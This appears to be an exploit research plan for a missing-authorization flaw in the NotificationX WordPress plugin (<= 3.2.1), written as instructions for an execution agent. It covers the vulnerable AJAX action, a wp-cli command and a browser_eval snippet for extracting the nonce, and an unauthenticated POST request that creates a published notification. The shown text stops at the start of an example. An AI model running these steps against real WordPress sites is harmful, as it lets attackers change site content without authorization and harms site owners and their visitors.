NotificationX – FOMO, Live Sales Notification, WooCommerce Sales Popup, GDPR, Social Proof, Announcement Banner & Floating Notification Bar <= 3.2.1 - Missing Authorization

This research plan outlines the technical steps required to exploit a missing authorization vulnerability in NotificationX (<= 3.2.1).

1. Vulnerability Summary

The NotificationX plugin for WordPress is vulnerable to Missing Authorization in its AJAX handlers. Specifically, the nx_handle_quick_builder action (and potentially others like nx_get_objects) is registered with both wp_ajax_ and wp_ajax_nopriv_ hooks, but the corresponding callback function fails to perform a current_user_can() check (e.g., for manage_options).

This allows unauthenticated attackers to create, modify, or delete "notifications" (custom post type notificationx), which are used to display FOMO alerts (sales, reviews, etc.) on the site.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: nx_handle_quick_builder
• Vulnerability Type: Missing Capability Check / Missing Authorization
• Authentication: None (Unauthenticated)
• Preconditions: The plugin must be active.
• Parameter: data (a URL-encoded string containing notification properties) and nonce (if required).

3. Code Flow (Inferred)

1. The plugin registers the action:
   add_action( 'wp_ajax_nopriv_nx_handle_quick_builder', 'nx_handle_quick_builder_callback' )
2. The nx_handle_quick_builder_callback function is called.
3. It retrieves the $_POST['data'] parameter and processes it using parse_str().
4. It calls wp_insert_post() or a similar wrapper to save the data to the notificationx custom post type.
5. Crucially, it lacks a check like if ( ! current_user_can( 'manage_options' ) ) wp_die();.

4. Nonce Acquisition Strategy

While the vulnerability is "Missing Authorization," the plugin may still check for a WordPress nonce. In NotificationX, nonces for the "Quick Builder" or frontend features are often localized for the frontend to support dynamic loading.

Strategy:

1. Identify Script Loading: The plugin enqueues scripts when a NotificationX notification is active or when the [notificationx] shortcode is present.
2. Setup Test Page: Create a public page containing the shortcode.

   wp post create --post_type=page --post_status=publish --post_title="Nonce Page" --post_content="[notificationx]"
   

3. Extract Nonce: Navigate to this page and use browser_eval to extract the nonce from the localized JavaScript objects.
   • Target Object: window.notificationx_public or window.nx_localize.
   • Nonce Key: nonce or nx_quick_builder_nonce.

   // Execution agent should try:
   browser_eval("window.notificationx_public?.nonce || window.nx_localize?.nonce")
   

5. Exploitation Strategy

The goal is to create a new "Sales Notification" unauthenticated.

HTTP Request (PoC)

• Method: POST
• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Headers: Content-Type: application/x-www-form-urlencoded
• Body Parameters:
  • action: nx_handle_quick_builder
  • nonce: [EXTRACTED_NONCE]
  • data: A URL-encoded string representing the notification details.
    • nx_notification_title: Vulnerable Notification
    • nx_source_type: sales
    • nx_notification_type: woo
    • nx_builder_step: 4 (Finalizing step in the builder)
    • nx_notification_status: publish

**Example